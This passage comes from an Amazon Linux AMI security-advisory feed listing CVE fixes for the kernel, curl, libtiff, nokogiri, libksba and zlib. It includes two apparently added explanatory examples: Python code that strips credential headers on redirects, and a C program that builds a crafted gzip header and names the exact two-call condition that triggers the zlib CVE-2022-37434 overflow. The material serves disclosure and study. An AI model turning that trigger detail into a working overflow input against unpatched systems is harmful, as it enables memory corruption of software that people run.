from="linux-security@amazon.com"><id>ALAS-2022-1645</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1645: important priority package update for 
kernel</title><issued date="2022-12-01 17:33:00" /><updated date="2024-07-03 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48651:
In the Linux kernel, the following vulnerability has been resolved: ipvlan: Fix out-of-bound bugs caused by unset skb->mac_header If an AF_PACKET socket is used to send packets through ipvlan and the default xmit function of the AF_PACKET socket is changed from dev_queue_xmit() to packet_direct_xmit() via setsockopt() with the option name of PACKET_QDISC_BYPASS, the skb->mac_header may not be reset and remains as the initial value of 65535, this may trigger slab-out-of-bounds bugs as following:
CVE-2022-43750:
drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor's internal memory.
CVE-2022-41850:
roccat_report_event in drivers/hid/hid-roccat.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free in certain situations where a report is received while copying a report->value is in progress.
CVE-2022-41849:
drivers/video/fbdev/smscufx.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free if a physically proximate attacker removes a USB device while calling open(), aka a race condition between ufx_ops_open and ufx_usb_disconnect.
CVE-2022-40768:
drivers/scsi/stex.c in the Linux kernel through 5.19.9 allows local users to obtain sensitive information from kernel memory because stex_queuecommand_lck lacks a memset for the PASSTHRU_CMD case.
CVE-2022-39842:
An issue was discovered in the Linux kernel before 5.19. In pxa3xx_gcu_write in drivers/video/fbdev/pxa3xx-gcu.c, the count parameter has a type conflict of size_t versus int, causing an integer overflow and bypassing the size check. After that, because it is used as the third argument to copy_from_user(), a heap overflow may occur.
CVE-2022-3649:
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.
CVE-2022-3646:
A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component nilfs2. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability.
CVE-2022-3621:
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920.
CVE-2022-3594:
A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component r8152 (USB network driver). The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363.
CVE-2022-3565:
A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component mISDN. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088.
CVE-2022-3564:
A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.
CVE-2022-3542:
A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function bnx2x_tpa_stop of the file drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c of the component bnx2x (Broadcom network driver). The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211042 is the identifier assigned to this vulnerability.
CVE-2022-2978:
A use-after-free flaw was found in the Linux kernel NILFS file system in the way a user can cause the function security_inode_alloc() to fail, which is followed by a call to nilfs_mdt_destroy(). A local user could use this flaw to crash the system or potentially escalate their privileges on the system.
CVE-2022-26373:
Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.
CVE-2022-20369:
In v4l2_m2m_querybuf of v4l2-mem2mem.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-223375145. References: Upstream kernel.
CVE-2021-47103:
In the Linux kernel, the following vulnerability has been resolved:
inet: fully convert sk->sk_rx_dst to RCU rules
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47103" title="" id="CVE-2021-47103" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20369" title="" id="CVE-2022-20369" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26373" title="" id="CVE-2022-26373" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2978" title="" id="CVE-2022-2978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3542" title="" id="CVE-2022-3542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3564" title="" id="CVE-2022-3564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3565" title="" id="CVE-2022-3565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3594" title="" id="CVE-2022-3594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3621" title="" id="CVE-2022-3621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3646" title="" id="CVE-2022-3646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3649" title="" id="CVE-2022-3649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39842" title="" id="CVE-2022-39842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40768" title="" id="CVE-2022-40768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41849" title="" id="CVE-2022-41849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41850" title="" id="CVE-2022-41850" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43750" title="" id="CVE-2022-43750" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48651" title="" id="CVE-2022-48651" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.299" release="152.520.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.299-152.520.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1646</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1646: medium priority package update for curl</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-35252:
A vulnerability was found in curl. This security flaw happens when curl is used to retrieve and parse cookies from an HTTP(S) server: it accepts cookies containing control codes (byte values below 32), and when such cookies are later sent back to an HTTP(S) server the server may respond with a 400 error. This issue effectively allows a "sister site" to deny service to its siblings, causing a denial of service.
CVE-2022-32208:
A vulnerability was found in curl. This issue occurs because it mishandles message verification failures when curl does FTP transfers secured by krb5. This flaw makes it possible for a man-in-the-middle attack to go unnoticed and allows data injection into the client.
CVE-2022-32206:
A vulnerability was found in curl. This issue occurs because the number of acceptable "links" in the "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps. This flaw leads to a denial of service, either by mistake or by a malicious actor.
CVE-2022-27782:
A vulnerability was found in curl. This issue occurs because curl can reuse a previously created connection even when a TLS or SSH-related option is changed that should have prohibited reuse. This flaw leads to an authentication bypass, either by mistake or by a malicious actor.
CVE-2022-27781:
A vulnerability was found in curl. When an application asks libcurl built against Network Security Services (NSS) for details of the server's certificate chain (the CURLOPT_CERTINFO option), an erroneous function lets a malicious server make curl get stuck in a never-ending busy loop while trying to retrieve that information. This flaw is an infinite loop that affects system availability.
CVE-2022-27776:
A vulnerability was found in curl. This security flaw allows leaking authentication or cookie header data on HTTP redirects to the same host but another port number. Sending the same set of headers to a server on a different port number is a problem for applications that pass on custom `Authorization:` or `Cookie:` headers. Those headers often contain privacy-sensitive information or data.
CVE-2022-27774:
A vulnerability was found in curl. This security flaw allows leaking credentials to other servers when it follows redirects from auth-protected HTTP(S) URLs to other protocols and port numbers.
CVE-2022-22576:
A vulnerability was found in curl. This security flaw allows reusing OAuth2-authenticated connections without properly ensuring that the connection was authenticated with the same credentials set for this transfer. This issue leads to an authentication bypass, either by mistake or by a malicious actor.
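<!-- Added example (editor's code, not curl's): a Python model of the redirect rule that the CVE-2022-27774 and CVE-2022-27776 descriptions above call for, where Authorization and Cookie style headers are re-sent only when the redirect target keeps the same scheme, host and port as the original request. The helper names, the CREDENTIAL_HEADERS set, the default-port table and the sample URLs are assumptions made for illustration, not curl internals.

```python
"""Decide which request headers may follow an HTTP redirect.

Added example (not curl's code): models the post-fix rule described for
CVE-2022-27774 and CVE-2022-27776, where credential-carrying headers are
re-sent only when scheme, host and port all match the original request.
Helper names, CREDENTIAL_HEADERS and the sample URLs below are assumptions.
"""
from urllib.parse import urlsplit

# Default ports used when the URL carries none, so "https://h/" and
# "https://h:443/" count as the same origin.
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "ftps": 990}

# Header names (lower case) that carry credentials and must not leak to a
# different origin. Assumed set for the example.
CREDENTIAL_HEADERS = {"authorization", "cookie", "proxy-authorization"}


def origin(url):
    """Return (scheme, host, effective port) for a URL, lower-cased."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return scheme, host, port


def same_origin(original_url, redirect_url):
    """True only when scheme, host and port are all identical."""
    return origin(original_url) == origin(redirect_url)


def headers_for_redirect(original_url, redirect_url, headers):
    """Return the headers to send to redirect_url.

    Credential headers are dropped unless the redirect stays on the same
    origin; every other header is forwarded unchanged. The caller's dict is
    not modified.
    """
    if same_origin(original_url, redirect_url):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in CREDENTIAL_HEADERS}


if __name__ == "__main__":
    # Made-up request: same host, different port, so Authorization is stripped.
    request_headers = {"Authorization": "Basic Zm9vOmJhcg==", "Accept": "*/*"}
    print(headers_for_redirect("https://example.com/login",
                               "https://example.com:8443/next", request_headers))
```

A port change (443 to 8443) and a scheme change (https to ftp) are both treated as a new origin, which is the behaviour the two advisories above ask for; a redirect to the same host on the default port keeps the headers.
-->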
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22576" title="" id="CVE-2022-22576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27774" title="" id="CVE-2022-27774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27776" title="" id="CVE-2022-27776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27781" title="" id="CVE-2022-27781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27782" title="" id="CVE-2022-27782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32206" title="" id="CVE-2022-32206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32208" title="" id="CVE-2022-32208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35252" title="" id="CVE-2022-35252" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.101.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.101.amzn1" epoch="0" 
arch="i686"><filename>Packages/curl-7.61.1-12.101.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.101.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.101.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1647</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1647: important priority package update for libtiff</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-2867:
A flaw was found in LibTIFF's tiffcrop utility: a uint32_t underflow can lead to an out-of-bounds read and write. This flaw allows an attacker who supplies a crafted file to tiffcrop to cause a crash or, in some cases, further exploitation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2867" title="" id="CVE-2022-2867" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.40.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.40.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.40.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1648</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1648: important priority package update for rubygem-nokogiri</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:43:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29181:
A flaw was found in the rubygem-nokogiri package: Nokogiri before 1.13.6 does not type-check all inputs into its XML and HTML4 SAX parsers, so specially crafted untrusted input can cause an illegal memory access (a segfault) or reads from unrelated memory. This flaw allows malicious users to change partial contents or configurations on the system, and it can also cause a limited denial of service in the form of interruptions in resource availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29181" title="" id="CVE-2022-29181" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem22-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem20-nokogiri-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1649</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1649: important priority package update for libksba</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3515:
A vulnerability was found in the Libksba library due to an integer overflow within the CRL parser. The vulnerability can be exploited remotely for code execution on the target system by passing specially crafted data to the application, for example, a malicious S/MIME attachment.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3515" title="" id="CVE-2022-3515" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libksba" version="1.3.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-1.3.5-1.10.amzn1.x86_64.rpm</filename></package><package name="libksba-debuginfo" version="1.3.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-debuginfo-1.3.5-1.10.amzn1.x86_64.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-devel-1.3.5-1.10.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-1.3.5-1.10.amzn1.i686.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-devel-1.3.5-1.10.amzn1.i686.rpm</filename></package><package name="libksba-debuginfo" version="1.3.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-debuginfo-1.3.5-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1650</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1650: medium priority package update for zlib</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37434:
A security vulnerability was found in zlib. A heap-based buffer over-read or buffer overflow in the inflate() function in inflate.c can be triggered via a large gzip header extra field. Only applications that call inflateGetHeader are affected: the extra field is copied into the caller-supplied gz_header buffer, and the copy length was computed incorrectly once more than extra_max bytes of the field had already been consumed.
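<![CDATA[
How the extra-field copy goes wrong, as an added example that is not code from this advisory or from zlib itself: the two copy-length expressions below are modelled on the FEXTRA handling in inflate.c as it was in upstream 1.2.12 and after the fix in 1.2.13 (the 1.2.8-7.20.amzn1 packages listed in this advisory are the backported fix), keeping the field names from gz_header and the inflate state. The gzip header, the application's buffer size and the split of the field across two inflate() calls are constructed for the demonstration. Nothing is copied out of bounds: the program only reports the memcpy length each version would use on the second call, which is where the unsigned subtraction wraps.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* State that zlib's inflate() keeps while consuming a gzip FEXTRA field,
   reduced to the fields the CVE-2022-37434 copy uses. extra/extra_max come
   from the gz_header the application registered with inflateGetHeader();
   extra_len is XLEN from the stream; length counts bytes still unread. */
typedef struct {
    unsigned char *extra;
    unsigned extra_max;
    unsigned extra_len;
    unsigned length;
} extra_state;

/* zlib 1.2.12: length handed to memcpy for a chunk holding `copy` bytes of
   the field. `len` is how much was stored by earlier inflate() calls. Once
   len exceeds extra_max, extra_max - len wraps to a huge unsigned value. */
static unsigned copy_len_1_2_12(const extra_state *st, unsigned copy) {
    unsigned len = st->extra_len - st->length;
    return len + copy > st->extra_max ? st->extra_max - len : copy;
}

/* zlib 1.2.13: the same expression, guarded so nothing is copied once the
   caller's buffer is full (the remaining field bytes are only skipped). */
static unsigned copy_len_1_2_13(const extra_state *st, unsigned copy) {
    unsigned len = st->extra_len - st->length;
    if (len >= st->extra_max) return 0;
    return len + copy > st->extra_max ? st->extra_max - len : copy;
}

/* Build a constructed gzip member header with FEXTRA set and an xlen-byte
   extra field of 'A's. Returns bytes written; out must hold 12 + xlen. */
static size_t build_gzip_header(unsigned char *out, unsigned xlen) {
    static const unsigned char fixed[10] = {
        0x1f, 0x8b, 0x08, 0x04, 0, 0, 0, 0, 0x00, 0x03 }; /* FLG = FEXTRA */
    memcpy(out, fixed, 10);
    out[10] = xlen & 0xff;            /* XLEN, little endian */
    out[11] = (xlen >> 8) & 0xff;
    memset(out + 12, 'A', xlen);
    return 12 + (size_t)xlen;
}

/* Feed the extra field through the two copy-length computations as if it
   arrived in two inflate() calls: `first` bytes of the field in the first
   call, the rest in the second. Records the memcpy length each version
   would use for the second call. Returns 0 on success, -1 on bad input. */
static int feed_in_two_calls(unsigned extra_max, unsigned xlen, unsigned first,
                             unsigned *len_1_2_12, unsigned *len_1_2_13) {
    unsigned char stream[12 + 4096];
    unsigned char appbuf[4096];
    if (xlen > 4096 || first > xlen || extra_max > 4096) return -1;
    size_t n = build_gzip_header(stream, xlen);
    if (n < 12 || stream[3] != 0x04) return -1;
    unsigned parsed_xlen = stream[10] | (stream[11] << 8);

    extra_state st = { appbuf, extra_max, parsed_xlen, parsed_xlen };

    /* First call: both versions clamp correctly because len == 0. */
    unsigned c1 = copy_len_1_2_13(&st, first);
    memcpy(st.extra, stream + 12, c1);
    st.length -= first;            /* inflate() skips what it cannot store */

    /* Second call: len == first, which may already exceed extra_max. */
    unsigned rest = st.length;
    *len_1_2_12 = copy_len_1_2_12(&st, rest);
    *len_1_2_13 = copy_len_1_2_13(&st, rest);
    return 0;
}

int main(void) {
    unsigned v, f;
    /* Application offers a 16-byte buffer; the stream declares 64 bytes of
       extra data, 40 of which arrive in the first inflate() call. */
    if (feed_in_two_calls(16, 64, 40, &v, &f) != 0) return 1;
    printf("second-call memcpy length: 1.2.12 = %u bytes, 1.2.13 = %u bytes\n",
           v, f);
    return 0;
}
```

The trigger needs the field to span two inflate() calls with the first call delivering more than extra_max bytes; a field that arrives in one call is clamped correctly by both versions, so a test that decompresses a whole gzip member from memory does not exercise the bug.
]]>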
